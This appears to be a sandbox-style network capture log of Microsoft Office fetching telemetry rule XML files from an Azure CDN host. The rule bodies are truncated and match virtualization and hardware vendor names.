                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


Session ID | Source IP | Source Port | Destination IP | Destination Port
60 | 192.168.2.4 | 49813 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:29 UTC | 192 | OUT | GET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:29 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:29 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 485
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                            ETag: "0x8DC582BB9769355"
                                                                                                                                                                            x-ms-request-id: e574f622-301e-0052-4beb-2565d6000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181229Z-r1755647c665dwkwce4e7gadz0000000065g00000000czz2
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:29 UTC | 485 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
61 | 192.168.2.4 | 49814 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:29 UTC | 192 | OUT | GET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:29 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:29 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 411
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                            ETag: "0x8DC582B989AF051"
                                                                                                                                                                            x-ms-request-id: 8e6d5db5-101e-0017-4c27-2747c7000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181229Z-17fbfdc98bbngfjxtncsq24exs0000000770000000001e31
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:29 UTC | 411 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            62 | 192.168.2.4 | 49815 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:29 UTC | 192 | OUT | GET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:29 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:29 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 470
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                            ETag: "0x8DC582BBB181F65"
                                                                                                                                                                            x-ms-request-id: 6cbbe1db-401e-0083-6516-26075c000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181229Z-r1755647c66tsn7nz9wda692z000000003t0000000005mr2
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:29 UTC | 470 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            63 | 192.168.2.4 | 49816 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:29 UTC | 192 | OUT | GET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:29 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:29 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                            ETag: "0x8DC582BB556A907"
                                                                                                                                                                            x-ms-request-id: 55f0c68d-501e-008f-5d50-239054000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181229Z-r1755647c66hbclz9tgqkaxg2w00000006w000000000efmp
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:29 UTC | 427 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            64 | 192.168.2.4 | 49817 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:30 UTC | 192 | OUT | GET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:30 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:30 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 502
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                            ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                            x-ms-request-id: 4e972348-801e-00ac-276d-28fd65000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181230Z-r1755647c66x7vzx9armv8e3cw000000075g0000000000c5
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:30 UTC | 502 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            65 | 192.168.2.4 | 49818 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:30 UTC | 192 | OUT | GET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:30 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:30 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                            ETag: "0x8DC582B9D30478D"
                                                                                                                                                                            x-ms-request-id: 9cbc4178-801e-008f-12a3-262c5d000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181230Z-r1755647c66gqcpzhw8q9nhnq000000006600000000055kb
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:30 UTC | 407 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            66 | 192.168.2.4 | 49819 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:30 UTC | 192 | OUT | GET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:30 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:30 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                            ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                            x-ms-request-id: ffa56774-c01e-007a-6c38-26b877000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181230Z-r1755647c6688lj6g0wg0rqr1400000005ng000000005bd5
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:30 UTC | 474 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
67 | 192.168.2.4 | 49820 | 13.107.253.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:30 UTC | 192 | OUT | GET /rules/rule120667v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:30 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:30 GMT
Content-Type: text/xml
Content-Length: 408
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
ETag: "0x8DC582BB9B6040B"
x-ms-request-id: 2e5beeba-d01e-002b-6c67-2825fb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181230Z-r1755647c66ss75qkr31zpy1kc0000000510000000009vkq
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:30 UTC | 408 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.2.4 | 49821 | 13.107.253.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:30 UTC | 192 | OUT | GET /rules/rule120668v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:30 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:30 GMT
Content-Type: text/xml
Content-Length: 469
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
ETag: "0x8DC582BB3CAEBB8"
x-ms-request-id: df53dfe1-801e-0067-2856-23fe30000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181230Z-17fbfdc98bb8lw78ye6qppf97g00000005v000000000cgr0
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:30 UTC | 469 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.2.4 | 49822 | 13.107.253.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:30 UTC | 192 | OUT | GET /rules/rule120669v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:31 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:31 GMT
Content-Type: text/xml
Content-Length: 416
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
ETag: "0x8DC582BB5284CCE"
x-ms-request-id: 321a447c-801e-002a-4da3-2631dc000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181231Z-r1755647c66gqcpzhw8q9nhnq000000006600000000055mf
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-28 18:12:31 UTC | 416 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.2.4 | 49823 | 13.107.253.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:31 UTC | 192 | OUT | GET /rules/rule120670v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:31 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:31 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
ETag: "0x8DC582B91EAD002"
x-ms-request-id: b7beb219-701e-0097-1404-27b8c1000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181231Z-r1755647c666qwwlm3r555dyqc00000005g000000000g04t
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-28 18:12:31 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
71 | 192.168.2.4 | 49824 | 13.107.253.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:31 UTC | 192 | OUT | GET /rules/rule120671v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:31 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:31 GMT
Content-Type: text/xml
Content-Length: 432
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
ETag: "0x8DC582BAABA2A10"
x-ms-request-id: 6741ff86-f01e-00aa-74b9-268521000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181231Z-r1755647c66hlhp26bqv22ant400000005hg000000009kqd
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:31 UTC | 432 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


Session ID  Source IP    Source Port  Destination IP  Destination Port
72          192.168.2.4  49825        13.107.253.45   443
Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:31 UTC  192                OUT        GET /rules/rule120672v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:31 UTC  470                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:31 GMT
Content-Type: text/xml
Content-Length: 475
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
ETag: "0x8DC582BBA740822"
x-ms-request-id: 8e6218f7-d01e-0066-7d57-27ea17000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181231Z-17fbfdc98bbsw6nnfh43fuwvyn00000003k0000000004qqm
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:31 UTC  475                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID  Source IP    Source Port  Destination IP  Destination Port
73          192.168.2.4  49826        13.107.253.45   443
Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:31 UTC  192                OUT        GET /rules/rule120673v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:31 UTC  491                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:31 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
ETag: "0x8DC582BB464F255"
x-ms-request-id: 48ec36c7-d01e-00a1-338d-2735b1000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181231Z-17fbfdc98bbh7l5skzh3rekksc00000006tg00000000696u
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:31 UTC  427                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session ID  Source IP    Source Port  Destination IP  Destination Port
74          192.168.2.4  49828        13.107.253.45   443
Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:32 UTC  192                OUT        GET /rules/rule120675v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:32 UTC  470                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:32 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
ETag: "0x8DC582BA6CF78C8"
x-ms-request-id: 44c43cee-601e-003e-459c-273248000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181232Z-r1755647c66vkwr5neys93e0h400000004w000000000dqgc
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:32 UTC  419                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID  Source IP    Source Port  Destination IP  Destination Port
75          192.168.2.4  49827        13.107.253.45   443
Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:32 UTC  192                OUT        GET /rules/rule120674v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:32 UTC  491                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:32 GMT
Content-Type: text/xml
Content-Length: 474
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
ETag: "0x8DC582BA4037B0D"
x-ms-request-id: ea5c4bf4-701e-000d-56e3-256de3000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181232Z-r1755647c66bdj57qqnd8h5hp80000000640000000001twh
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:32 UTC  474                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID  Source IP    Source Port  Destination IP  Destination Port
76          192.168.2.4  49830        13.107.253.45   443
Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:32 UTC  192                OUT        GET /rules/rule120677v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:32 UTC  491                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:32 GMT
Content-Type: text/xml
Content-Length: 405
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
ETag: "0x8DC582B942B6AFF"
x-ms-request-id: 9577fd14-901e-0016-4fa3-26efe9000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181232Z-17fbfdc98bb2rxf2hfvcfz540000000003a000000000a2r0
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:32 UTC  405                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            77192.168.2.44982913.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:32 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:32 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:32 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B984BF177"
x-ms-request-id: f46f8e47-e01e-00aa-72c7-20ceda000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181232Z-r1755647c665dwkwce4e7gadz00000000670000000008e88
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:32 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
78 | 192.168.2.4 | 49831 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:32 UTC | 192 | OUT | GET /rules/rule120678v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:32 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:32 GMT
Content-Type: text/xml
Content-Length: 468
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
ETag: "0x8DC582BBA642BF4"
x-ms-request-id: de1a9787-701e-006f-48ae-26afc4000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181232Z-r1755647c66ljccje5cnds62nc000000043000000000bqnr
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-28 18:12:32 UTC | 468 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 49833 | 13.107.253.45 | 443 | 5804 | C:\Program Files\Google\Chrome\Application\chrome.exe
